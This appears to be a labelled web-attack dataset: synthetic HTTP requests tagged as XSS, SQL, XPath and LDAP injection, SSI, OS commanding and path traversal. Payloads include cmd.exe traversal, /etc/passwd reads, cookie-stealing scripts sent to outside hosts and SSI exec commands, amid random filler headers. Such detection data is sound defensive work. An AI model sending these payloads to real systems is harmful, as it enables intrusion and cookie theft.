Cookie: xhMdi=<!--     #exec  cmd="c:\progra~1\ertrfw\3l\tcoheay.exe    d:\tljpee\www.taetis.org\r0xT\database.mdb   /x exporttofoxpro"-->;Toithehi=oaludmDa57xudtnsiz;1mjjUpH=dm42Sikuo0;ubvchraLi=8475;tO=[5bv;UGN1@FVye=nic
Cookie2: $Version="759"
Date: Mon, 01 Mar 10 13:02:14 GMT
If-Unmodified-Since: Fri, 10 Mar 06 12:46:19 GMT
If-None-Match: "gRJkf3bI@DgJ_m7q"
Max-Forwards: 12
Proxy-Authorization: Basic eWxqbjpnaW9zZDU=
Range: 785-,6985-48,34549-2
Referer: http://www.tSyonhir.com/ezts/t6ealg/w1zuad/ritins3/OqatEWd.shtml
User-Agent: Mozilla/1.5 (Windows; U; Win 9x 0.7; go-fr; rv:8.4.4) Gecko/53600346

null

End - Id: 40237
Start - Id: 44534
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: 240.51.32.215
Connection: ctatAT
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: eiNu-Cnncrcur, I4jii-eibia;q=0.1, j4bSev-DL
Cache-Control: max-stale=12153
Client-ip: 106.174.171.250
Cookie: e63im0en=6
Cookie2: $Version="79"
Date: Wed, 15 Mar 06 20:54:46 UTC
ETag: W/"5wo8GtlINXLRQtwrv"
Expect: swso=vdlpOs
If-Modified-Since: Sun, 19 Jul 09 12:44:49 CET
If-Unmodified-Since: Wed, 13 Jun 07 09:58:11 UTC
If-Match: *
If-None-Match: "ZBaC@EA2nBCb@.gpc5s_"
If-Range: "C9tmw1xtJVjMzVDsmTI-"
Max-Forwards: 4
Pragma: ao=wna
Proxy-Authorization: wOenhg wikc=uN2atn
Authorization: ertp 4ZbohOh=ntonn
Range: 30684-
Referer: http://fifc.it/nnbTn0t/32wrn/knEbei/ueuiIrO.tar.gz
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.4 (Windows; U; Win98 0.5; su-at; rv:4.1.8) Gecko/29318823
UA-CPU: 68000
UA-Disp: 692,7147,32
Via: 2.3 www.ari3lDE.tiff:31
Transfer-Encoding: identity
X-Forwarded-For: 49.170.176.68

null

End - Id: 44534
Start - Id: 48267
class: XSS
PUT /b6H8Jzu6AEAkXxcbizvb/rahjne/uAgBYa7530J0palIzB4d/nQgb6whX5QyHsd39/dwFhttpqYEnode.ctmphX9f.jpg? HTTP/1.1
Content-Length: 128
Content-Language: itohr,n,1pz
Content-Encoding: identity
Content-Location: /arht2ls/nerhwhes/neirtto/h5aeof.pdf
Content-MD5: b2F0ZG5jcjZleGFuOXM1dw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Mar 07 02:01:00 GMT
Last-Modified: Wed, 23 May 07 03:59:08 GMT
Host: 204.224.221.76
Connection: keep-alive
Accept: audio/*;q=0.7, audio/*;q=0.2, text/xml;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 211.13.238.111
Cookie: leupsnawa=740;dEqPRuGbin9PJ.=<![CDATA[<!--]]  ><script>[document.location.replace    ('http://www.ta.com/cgi-bin/elaret.cgi'+document.cookie);]//--></script>;n0wEoirtm1tulsc=3;rdhcj4ltre3a3ng=097781
Cookie2: $Version="31"
Date: Tue, 20 Sep 05 20:07:29 GMT
ETag: W/"Njnh-vLd42p_SsCtNRo"
Expect: 100-continue
From: auahg@3jfcevEe.net
If-Modified-Since: Thu, 02 Feb 06 12:28:31 CET
If-Unmodified-Since: Thu, 03 Nov 05 05:54:10 UTC
If-Match: *
If-None-Match: "8doIde-FHwpmNjKKx"
If-Range: *
Max-Forwards: 3995
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic aGV5NXNpOnNLb28=
Authorization: NTLM YWRveEZVQWNvb3JzdEV0YXlkZTlhZjJoZXZ0bnRlZDBlbHNsaWFmZ3pHT3NzbA==
Range: 4495-934,2-3914
Referer: /aeh7/Krfiv.exe
TE: gzip,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.2 (Windows; U; Windows NT 1.3; do-ts; rv:9.8.1) Gecko/01426272
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 9755x524
Via: 7.6 179.102.76.217, 7.9 www.hi8rw.js
Transfer-Encoding: deflate
Upgrade: cwO/8.6, ndxoas/3.8
Warning: 206 www.1psi7dr.css "kroeMrnpwdctalj" 
X-Serial-Number: 96907185083
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

shutdownsock_streamagm9=u7S&mxb=52731&PZKS=82&sdeot6ta2ehe=weu&rah=ztmtiadqAe&n7t=zrt1l/ou1n9rd&rronrtot=9595340517&rvLBZY.=al

End - Id: 48267
Start - Id: 36275
class: PathTransversal
GET /eJ.4noT301wXo_AK/qtib9liMSomraM2e/vabl8z-8m@A_lF/9v-EH/cPVwM./Uboot.iniwrhEFFfZ/s.0W_/BimgOostdinRuC.nsf?sarcte=yse%25uqmittsat4+dmd&6ecefyetcDi1=uHOntaer6oupgEl&tiAnhi3a=td2og%3CSa&uW81=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.0
Host: www.ino7n1.biz
Connection: nr7u
Accept: image/png;q=0.3, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: 0etgz='oc2nh'
Client-ip: 117.40.148.200
Cookie: TtleHho8edth=ncUbvxu.GrH;37=itsGe;d4t9iRlijkzt=' s7Ee;TmHgYWpsCO21=95962317
Cookie2: $Version="13"
Date: Sat, 19 Jun 04 08:24:00 UTC
ETag: W/".jBrm6gfYyvDzZY"
Expect: eeoeO=e3rsdt9
If-Modified-Since: Thu, 22 Jan 04 08:49:29 UTC
If-Unmodified-Since: Thu, 30 Nov 06 21:00:47 CET
If-Match: "X-Yv8sav9fTbMZeV"
If-None-Match: "10VRY0GGsC.J-tBl3In"
If-Range: Wed, 19 Sep 07 04:56:44 UTC
Max-Forwards: 986
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=/EdPyb.php3
Referer: http://www.noeeuOrh.be/hThgeeac/tb8ms4on/fwty/osSjcu3/uaoOwps.avi
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: tbteRnsv/9.8.1.5.3
UA-OS: Solaris
UA-Pixels: 070x739
Via: 2.0 www.pgNcu.jpeg, 1.7 www.Nsoaetq.jpg
Transfer-Encoding: deflate
Upgrade: t6a9mC/0.8, isrjmh/3.6, Wb7h6/0.9
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36275
Start - Id: 41406
class: SqlInjection
PUT /lYOz@7XbY.php3? HTTP/1.1
Content-Length: 177
Content-Language: gmgl60t,fntses
Content-Encoding: compress
Content-Location: /noipglz/sieior/Atro/sA4nmp/nnapetia.jpeg
Content-MD5: eWZzdE1zZWVqZTdvYUl0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Mar 05 12:53:17 UTC
Last-Modified: Fri, 06 Oct 06 13:57:12 GMT
Host: 228.238.192.167:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 137.185.218.253
Cookie: n0=7597;idt39Xks='ta;na=82;btisaytrk0cH=27711540;rfThihr=Oetrasleax
Cookie2: $Version="59"
Date: Wed, 17 Nov 04 04:52:54 CET
ETag: "rHeFjrsZGZRJDQJiVfX"
Expect: jeuN
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Sun, 18 May 08 09:14:33 CET
If-Unmodified-Since: Sat, 18 Mar 06 18:45:56 CET
If-Match: "AZm-PJ_fLCL1_5Y"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: cTtsb nlsttnre=nmx5nae7
Range: 24-
Referer: /mt6sieyy/e1sL/lleeLiaN/rirhm8/reecs.dll
TE: trailers,trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/5.8 (compatible; MSIE 5.7; Unix; syfmlse7; s3srhNtraa; 61et)
UA-CPU: StrongARM
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: HTTP/8.8 78.35.243.148
Transfer-Encoding: compress
Upgrade: etntne/4.1, Iossd/8.2
Warning: 389 72.143.124.240 "uchiol" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nnuytt6S0s=i9eeee&eeOgdnanrti=OR   'aeyZbrfpy'   IN     ( ' ')&toshCnt=ttechildcpsg&LvHw8IvpSCSf=8574&N5RZIri=231269&ba=aN5A&newwUie7ien=HLc&dxEbjw=NoRl1arn13riagk1t

End - Id: 41406
Start - Id: 36461
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 58.174.148.134
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.0, x-mac-cyrillic, iso-8859-1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale=9972
Client-ip: 9.139.53.150
Cookie: teih7pNtwkvq=dJqaX_Kh;rtmrIDb1agittx=3264664;qn=rRW;dnad=n1eTe;oRLEsl9ewluren=1978958
Cookie2: $Version="612"
Date: Tue, 30 Mar 04 19:58:06 UTC
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: amnm6
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Mon, 08 Mar 10 04:09:38 GMT
If-Match: *
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: "C2iD83XH4OAhphnS@_PV"
Max-Forwards: 0771
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: Basic M2FwdHNvZHI6TG90YWVzTnM=
Range: 57-,410056-,436232-1281
Referer: http://www.dZpHthni.biz/emeeN/ew4ddeg.wmn
TE: trailers,gzip
Trailer: Referer
User-Agent: na6_IZt8 http://www.optarznr.fr
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 428x8640
Via: i2mes/6.4 154.201.149.205
Transfer-Encoding: deflate
Upgrade: fet/9.1, iro/2.9
Warning: 940 176.201.209.211 "dndrrAtk" "Mon, 05 Jan 04 22:49:43 CET"
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36461
Start - Id: 36493
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 151.69.36.216
Connection: h0ouae
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: nwt1apea-aeincl;q=0.4, eersla-1e, r3-n5lnerob;q=0.9, beaIf-shR5zrev
Cache-Control: max-stale=7347
Client-ip: 219.137.139.146
Cookie: gei=diXE0Mhf0;ns3jot=sNMAay;es7j9arb6=147334;ttEzot=acdihn0im;eNncth=156
Cookie2: $Version="38"
Date: Sat, 21 Oct 06 20:03:28 GMT
ETag: W/"vjbM4Bxb6G26xH._"
Expect: araac
From: yhsuhbpt@ehi8.net
If-Modified-Since: Sun, 09 Aug 09 09:21:51 CET
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "8NqOGhZtd.10osrYsCUi"
If-None-Match: *
If-Range: Thu, 17 Aug 06 17:47:41 UTC
Max-Forwards: 904
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: NTLM YmFhcmdhbWd2ZXNxMmU0bzdmbnhpYWliaWVUaW9vYWF0QmVhZXRHRTA=
Range: 998505-,-0540,815-
Referer: http://www.oSjBr.biz/T1atea/trpb/8genrnse.sh
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.1 (Machintosh; U; PPC 0.6; ui-wG; rv:7.2.2) Gecko/01325445
UA-CPU: MIPS
UA-Disp: 900,140,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 512x1298
Via: 9.4 www.tadyh.html, 9.3 91.177.66.124, 3.2 187.152.126.45:9602
Transfer-Encoding: deflate
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36493
Start - Id: 44364
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 92.251.180.196:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-10646-ucs-2;q=0.4, x-mac-icelandic, windows-1253, x-mac-japanese;q=0.0, utf-8
Accept-Encoding: compress
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 85.70.71.191
Cookie: aetisws4sriA=sjee vd8~m7;Nieth=n9mailrt;eW=xohrrhir;depoearnAwd9ii=cynsbgsound
Cookie2: $Version="4"
Date: Thu, 11 Mar 04 18:58:20 UTC
ETag: "0sJ3U838L7y6r98kvw"
Expect: eont=ltkcnd;tS3s
From: ks7mao@6esnaehk.it
If-Modified-Since: Thu, 05 Nov 09 01:53:09 UTC
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: *
If-Range: "usvv7nHn.nQv.BAuoaKB"
Max-Forwards: 4101
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="750EEeFddf3CD4eDAAABC5d54CeAD4BE"
Range: -126597,56874-704
Referer: http://www.U8tn.de/dtrdshs/dsktps3a/seearadh.ace
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/5.7 (Machintosh; U; Mac OS X 6.6; eu-na; rv:3.5.4) Gecko/22911632
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.tmnw.png
Transfer-Encoding: Gcei
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44364
Start - Id: 49544
class: XPathInjection
GET /ezQj0gjM3/kaiesi.pl?aeOnparaipnj=ijP&j4Bx2connectfxXY9=65684236&8_um7EimgeWDEx=aelnhnwtitsnaeIi&eeefcoin1aCoS=q%25o+kwt%5D%2Fand4se&Aycn8o=3853&Syxn5ieR=658541826&mtHK=Amkii%40iudoud11ee%3C+ow&VxGSn0MY=vQ1KG0B6&5anpAqSo1o51t=81637+++or+++++7eop%2FwgsEY%2F3ks%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D5%5D++or+3%3D&QfLe_S=iuGKO1R9FW7Z&jRF.4EB0Q=Gsa&anlorLoTtqa=likeshutdown HTTP/1.1
Host: www.05eelhutt.biz
Connection: aejl9r
Accept: application/*, video/*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 74.98.44.206
Cookie: OPrE0Gp7uETf=mhlnktr8wutldeldoy;unurue=7417;i2E9titli7if7=adshome;eLie2Qx=>
Cookie2: $Version="293"
Date: Tue, 05 Oct 04 24:31:03 CET
ETag: "-RjzUPDGi0.zC78Rw@4@"
Expect: ay2otsbp=eltj
From: wirtsy@nexe4eht.ch
If-Modified-Since: Sat, 01 Nov 08 02:11:46 UTC
If-Unmodified-Since: Sat, 29 Sep 07 22:20:32 UTC
If-Match: *
If-None-Match: "tsARRZlvDUyF3_L"
If-Range: Wed, 08 Mar 06 07:57:31 UTC
Max-Forwards: 4
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cm1Cbm5naWx0Y2FzcEdob3RyYTJrbDBlOW5udWNlZXJiY29ibnN1c2FzeW9hemM=
Range: 37-87
Referer: http://www.24lqa.gov/bdet/konoeo.sh
TE: gzip,deflate,chunked;q=0.8
Trailer: Accept-Charset
User-Agent: sBqlZv5 http://www.2ghan.fr
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4014x885
Via: rvo/4.7 www.mrs0fNie.css:3, FTP/6.7 www.s1Id.htm, 6.2 www.mhaGsnAo.jpg
Transfer-Encoding: thev
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 84222466016930
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49544
Start - Id: 41386
class: SqlInjection
POST /C1W/8QKhs@Nnv-bF5L8NSp1r/ranolekhsnhLBOaiuoo/dks0JzgepOuSJxK/iPZe0Tuu5pTS9gJxf.mdb? HTTP/1.0
Content-Length: 170
Content-Language: L,tZutsota,3a
Content-Encoding: compress
Content-Location: http://www.omhr59tm.uk/whuSiumI/sise/ipyQ3Tel.mspx
Content-MD5: dW50cmdjZGpPZWN6OWV2Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 Mar 04 08:22:57 GMT
Last-Modified: Thu, 15 Mar 07 04:03:16 GMT
Host: 223.219.77.78
Connection: aggeaoet
Accept: video/*, audio/basic;q=0.9, text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: S-nEbsi, xaPto-2cR4;q=0.5
Cache-Control: max-age=30284
Client-ip: 93.72.204.142
Cookie: ngtD=2YhR8R;esEeish=3c82I4.IL2iT;seaYhrMpzlna5r=3
Cookie2: $Version="753"
Date: Mon, 22 Nov 04 08:24:02 UTC
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: eFdpx@Molwro.de
If-Modified-Since: Thu, 06 Dec 07 02:24:43 UTC
If-Unmodified-Since: Fri, 31 Aug 07 08:01:52 GMT
If-Match: "3aFdvtY3X_8nR2hTZe@"
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 2.2
Pragma: osd='1k75ipmn'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest algorithm=ahIeaoa
Range: -9924,02717-,6-82569
Referer: /tspiiswr/cxors/9tansmst.swf
TE: chunked;q=0.2
Trailer: Accept-Language
User-Agent: v7YVY- http://www.nuIp5.it
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1178x5140
Via: rhlswi/0.0 179.26.152.175
Transfer-Encoding: deflate
Upgrade: bwir7/9.5, 0rA2/5.4
Warning: 978 www.aeers.png "pstsl2qua0E" "Sat, 06 Mar 10 21:32:52 GMT"
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

0dfhcriof=eecjcgmWunion> gu&services@xP-oq=3&aoz=svfn&Nnveinsr=f1qcFCRbw&cxii0gsya5qh='   )   UNION    ALL     SELECT 60 FROM   1sULtfFet WHERE (    ''= '

End - Id: 41386
Start - Id: 47714
class: XSS
GET /hmrtleh2weehdU/nafsta54eebum/zharecss/ei2aed3ie8htylso5stt/8en9d/5m.autoexecchildh5/ic40lqsttennfx/KV5P7DZs.catdi/d3FtN.sh?99ttrret5s0=%24+u%3Anwget%2Brcpbunionnimgmetas+oSm&k2YnehTfraz9e=94&iSeIeon=tsics&jOv6tczuidrsD=2414&7dem=%29+47os&tdlas9Boat6bt=jboD0V&enuctso=%3Ca+++href++%3D++%22about%3A%3Cs%26%2399%3Bript%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.sien.com%2Fcgi-bin%2Fna.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E++%22++%3E&otlt=r+&nAhJ8gDa=r%7EEjoholTufepassthru&pHiafieTlc=cgok&ntHun7Zpr8Rd=oig3&msbtrnPw=iww3e&Zand59y8.Vh=7006131565&ltd0l=weiimg%2Be&4na=22 HTTP/1.0
Host: 170.20.213.178
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesesimp;q=0.9, x-mac-icelandic;q=0.0, windows-1251, windows-1257
Accept-Encoding: *
Accept-Language: 3ncevh-ulhmTlh;q=0.8, foS-n, wz-n, sna-ysb0w;q=0.4
Cache-Control: no-cache
Client-ip: 245.204.137.49
Cookie: HeeamatrenbnE=659
Cookie2: $Version="5"
Date: Sat, 20 Mar 10 09:15:54 CET
ETag: "o8srXj_tTzX-96_kyD"
Expect: eAkt=es3Stmno
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Tue, 02 Nov 04 09:16:53 CET
If-Unmodified-Since: Mon, 13 Dec 04 11:24:05 GMT
If-Match: "uTeelEarBVxwdPWk"
If-None-Match: "E5U1J-OzlrX306G"
If-Range: Mon, 17 May 04 01:21:28 CET
Max-Forwards: 9247
MIME-Version: 1.4
Pragma: 5nkTai=e
Proxy-Authorization: Digest realm
Authorization: NTLM b2lyb3Rzb2hiYXBpbGlhbkxBZ2hkdWVybWx5b2hjdnNyZXJjZVRoc2F0aEdqaU8=
Range: 2174-,56-,-57382
Referer: /m3utaD7.mspx
TE: trailers,deflate
Trailer: Date
User-Agent: eln4vot/6.9.7
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5167x472
Via: 6.0 www.gem9.js, 4.9 68.33.210.1:260, djl/9.9 www.m5ord1.html
Transfer-Encoding: qpthd; ttespalb=ifriac
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47714
Start - Id: 40123
class: SSI
GET /0v1syc0.TY/Ouw3/trnatrnlht1oiatirn/aw0eCNz/FiCg_EblGK/szgnnjud94ouweej.cgi?p1pT7gpd=jqhoZ%3Br%27+logends+a+w&roa4wntHoi=ubategroup+bysh5%3Aseneyd&MkfGDgnodeKjdrmn=+o&FgVLt8UMS4UE=%3C%21--++++%23exec+++cmd%3D%22%2Fbin%2Fls++-l+++%2Fhome%2Fid7nrww%2Foaho3to%22+++++--%3E&vb=tprocessing-instructionOeaMsn&eneoi1py=0rNelraoy7mTiwt&NM8y=antzrwtinlind4m HTTP/1.1
Host: 103.248.21.147
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: Ekg38-Egdurii, uoeq3-Kvsblw;q=0.4, o-ehsq;q=0.6, i-nM;q=0.3
Cache-Control: no-transform
Client-ip: 233.132.159.137
Cookie: eNnpNd=1524901
Cookie2: $Version="0"
Date: Wed, 31 Aug 05 20:27:09 CET
ETag: W/"2pP93uTxOps6cWjVyp"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Mon, 27 Aug 07 06:05:21 GMT
If-Unmodified-Since: Fri, 16 May 08 24:37:33 GMT
If-Match: "i6y-8qpIzMpuDJTrZ0"
If-None-Match: "CpNCTLr5Jy4ub0OGL3"
If-Range: Tue, 29 Jul 08 13:06:30 GMT
Max-Forwards: 90
MIME-Version: 9.5
Pragma: aWohni='se3tct'
Proxy-Authorization: nCnw eRpaem=hnrtT
Authorization: Digest response="BFB6c7b2c7F2FbD3a21bD3989F0Ce1B6"
Range: 7457-,9-
Referer: /Ns6Se/a13tgwag/Intapr/exoCetis/Iaessp.asmx
TE: deflate
Trailer: Proxy-Authorization
User-Agent: suttu/2.7.0.3
UA-CPU: Sparc
UA-Disp: 6012,9490,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 768x931
Via: FTP/7.1 www.iaaitnwc.gif:19845, 2.6 131.29.96.60
Transfer-Encoding: mts9ws; kioho=gnahm
Upgrade: cCeeG/6.9, rnime/3.6
Warning: 580 www.48eepRt.jpg "otrmnt" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 42315795
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40123
Start - Id: 35788
class: XPathInjection
GET /gttWSshtef/tVonm1e9at14At/uarZyWeM.Z7vJ-pcaD/Tdap1iooIhooDo0r/uyse75fimtsszzi/vZ@BtzN_51FRfg50Aw3/soCDN@/iehhatEaa7o3nbneeA/exasfaen5.js?7a0hde8mw=wh9Teve&dco=hi%27+++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+i+++%2B+++j+++%2B++k%2B+l+++%2B++++1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++%27uaohoy%27++%3D%27+sn6mlstE%27+or&Ehdreabdeos=rnetcatua%2B&yewytnrytfale=%5DnG8slikebetweenylocation%28i8e&rsiA5%u=622&citfeloon=ucVjbw&t6=tuEaF_%40n&EbyfO8hrhtE=2886485133 HTTP/1.1
Host: 3.145.182.177
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, compress;q=0.0, deflate
Accept-Language: *;q=0.8
Cookie: REbo=h=;ood=drop6$eq;1inputu3j1n=openn
Cookie2: $Version="1"
Date: Wed, 18 Jan 06 07:53:41 GMT
ETag: "vy@i_rJBzSWPindrb"
If-Unmodified-Since: Thu, 13 Mar 08 08:51:35 UTC
If-None-Match: *
If-Range: Tue, 03 Aug 04 12:35:15 CET
Max-Forwards: 168
Pragma: no-cache
Referer: /rsPiSEtR/9rebsce/6htacahW.mspx
User-Agent: Tvnli/2.0.1.7
Warning: 396 72.31.252.105:54837 "8rfz" "Tue, 15 Dec 09 08:04:48 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35788
Start - Id: 37149
class: LdapInjection
GET /7dnehi2lbosMnnscni/hD9T39-h.css?Rc@4T=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.llhNhfkidl.net
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-7;q=0.1, cp-932, x-mac-korean;q=0.7, windows-874;q=0.9
Accept-Encoding: deflate, identity, identity, deflate, identity;q=0.1
Accept-Language: *;q=0.1
Cache-Control: max-stale=41
Client-ip: 159.233.41.170
Cookie: WaaeSwOiCtogA9n=otad;iic=tSSzKnjlbQ4X;IEeyiTa2zohyot=+n;5eoaseeh=3974142
Cookie2: $Version="12"
Date: Wed, 24 Feb 10 12:55:19 GMT
ETag: W/"RxU5d45Z4IV2969"
Expect: mawdi
From: tiriuma2@nheraeb.net
If-Modified-Since: Wed, 12 May 04 16:36:10 UTC
If-Unmodified-Since: Thu, 19 Feb 09 12:58:52 UTC
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: *
If-Range: *
Max-Forwards: 6180
MIME-Version: 8.7
Pragma: oiiak='oeuithoe'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: rTre reoyn=d9imh
Range: 88347-,9-
Referer: /lhiRe/ssdtye/neena/peglnhe3/esntsqf5.pl
TE: trailers
Trailer: Accept-Language
User-Agent: d.mL9f http://www.nkddtbi.gov
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 9.9 www.nnl4c.jpeg, 1.7 85.248.190.105, 5.6 www.ndSia7ig.gif:6
Transfer-Encoding: identity
Upgrade: rn2ata/5.1
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 46.83.73.112
X-Serial-Number: 4738976742686812
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37149
Start - Id: 39379
class: SSI
GET /yp2XSc8mjQvUFQz/Ddltgr6nhydysg/haflSwegsoa/3rpwc/9-ZVpassthrumN/nCAS-qcopy.bin?io=%3C%21--%23email+fromhost%3D%22www.s1naeme.com%22+tohost%3D%22mailbox.leez.com%22+message%3D%226aul+rmatle+2D+Otnra%22+fromaddress%3D%22thU2.com%22+toaddress%3D%22eop.esra.com%22+subject%3D%22q%22+sender%3D%22slsQ.com%22+replyto%3D%22cxisOso.com%22+cc%3D%22s5hn%22+inreplyto%3D%22Axn+esH+ro%22+id%3D%22omtmmail%22+--%3E&en2rSehe=o&eenhpn=493856&e7ilDe=%296nnhsuneidhivs HTTP/1.0
